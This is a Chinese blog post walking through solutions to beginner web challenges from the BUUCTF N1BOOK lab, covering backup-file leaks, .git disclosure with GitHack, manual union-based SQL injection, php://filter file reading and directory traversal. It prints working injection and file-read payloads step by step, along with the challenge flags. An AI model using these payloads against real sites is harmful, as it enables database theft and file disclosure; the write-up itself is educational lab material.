BUUCTF-N1BOOK(web1)学习分享

文章介绍了web入门中的安全问题,包括敏感文件泄漏、SQL注入攻击、GitHack工具利用、目录穿越和PHP伪协议。详细展示了如何通过各种技术手段获取flag并学习了相关知识点。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

目录

[第一章 web入门]常见的搜集1

[第一章 web入门]粗心的小李1

[第一章 web入门]SQL注入-1 

[第一章 web入门]afr_1

 [第一章 web入门]afr_2


[第一章 web入门]常见的搜集1

 敏感文件泄漏使用工具进行目录扫描

访问得到一个txt文件的路径,访问得到半个flag

访问index.php~得到flag2

 访问.index.php.swp使用记事本打开得到flag3拼接起来就可以了

flag=n1book{info_1s_v3ry_imp0rtant_hack}

[第一章 web入门]粗心的小李1

 使用GitHack工具进行访问下载index.html文件

Githack下载:GitHub - lijiejie/GitHack: A `.git` folder disclosure exploit

 在本地访问index.html得到flag

flag=n1book{git_looks_s0_easyfun}

[第一章 web入门]SQL注入-1 

 

使用‘进行测试注入类型,发现有回显得知是字符型注入

在使用order by进行测试字段长度

id=1' order by 3 --+

 输入3产生回显,4没有回显 证明字段数为三位

使用联合语句进行查询数据库

id=-1' union select 1,databse(),3 --+

 得到数据库名note,进行查询数据表

?id=-1'union select 1,database(),group_concat(table_name) from information_schema.tables where table_schema = database()--+

 发现flag字样的表进行查询表内的字段

?id=-1'union select 1,database(),group_concat(column_name) from information_schema.columns where table_name = 'fl4g'--+

 得到flag字段,进行查询字段值

?id=-1'union select 1,database(),group_concat(fllllag) from note.fl4g--+

得到flag

flag= n1book{union_select_is_so_cool}

[第一章 web入门]afr_1

使用php伪协议进行文件读取

?p=php://filter/read=convert.base64-encode/resource=flag

进行base64解码得到flag

 flag=n1book{afr_1_solved}

 [第一章 web入门]afr_2

 f12查看源码,有个img目录

进行目录穿越../得到根目录,得到flag

 flag=n1book{afr_2_solved}

考察知识点:

1.常见的备份文件,目录扫描

2.git文件泄漏和GitHack工具的使用

3.sql手工注入,联合查询

4.php伪协议的使用,目录穿越

评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值